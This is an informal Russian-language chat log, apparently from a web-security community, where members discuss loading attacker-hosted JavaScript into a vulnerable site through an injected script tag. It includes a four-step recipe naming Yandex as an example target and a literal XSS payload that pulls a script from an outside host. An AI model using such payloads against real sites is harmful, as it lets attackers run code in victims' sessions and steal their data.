P
ирония это
он же написал
"и на своем эвил сайте разместить xss пейлоад"
Size: a a a
2020 May 11
P
I
странные у тебя шутки
P
"xss пейлоад"
I
ты собираешься у себя хостить пейлоад, а инклудить на уязвимом сайте?
P
я уточнял реальность такого вектора, насколько это может сработать. есть ли смысл заморачиватся с тестами на реальном сайте, просто уже предварительно у некоторых людей из чата в лс спрашивал некоторые вещи, объяснили так, что даже тестить не пришлось
P
ты собираешься у себя хостить пейлоад, а инклудить на уязвимом сайте?
так и получается
I
короч
1. у себя хостишь "вредоносный" JS с например пейлоадом XSS Hunter
2. находишь хсс в Яндексе, но места мало, весь код Хантера не влезет
3. делаешь хсску "<script src=//pulsar.ru/1.js"></script>
4. JS подключится с твоего сайта и исполнится в контексте яндекса
1. у себя хостишь "вредоносный" JS с например пейлоадом XSS Hunter
2. находишь хсс в Яндексе, но места мало, весь код Хантера не влезет
3. делаешь хсску "<script src=//pulsar.ru/1.js"></script>
4. JS подключится с твоего сайта и исполнится в контексте яндекса
P
в целом так и думал кроме яндекса и хантера
P
т.е. всё таки норм идея. спасибо
А
т.е. всё таки норм идея. спасибо
Поздравляю с открытием stored xss
I0
Поздравляю с открытием stored xss
Это не blind)
P
каким местом это блайнд?
А
можно ли через html inj засунуть в код страницы ссылку на js файл типа <script src="site.com/evil.js> и на своем эвил сайте разместить xss пейлоад?
<script src>?
GD
лоло
P
такая же реакция)
GD
double blind self-xss
P
это сильно. можно подробнее?!
P
double penetration
I
double injection
penetration это по другой части
penetration это по другой части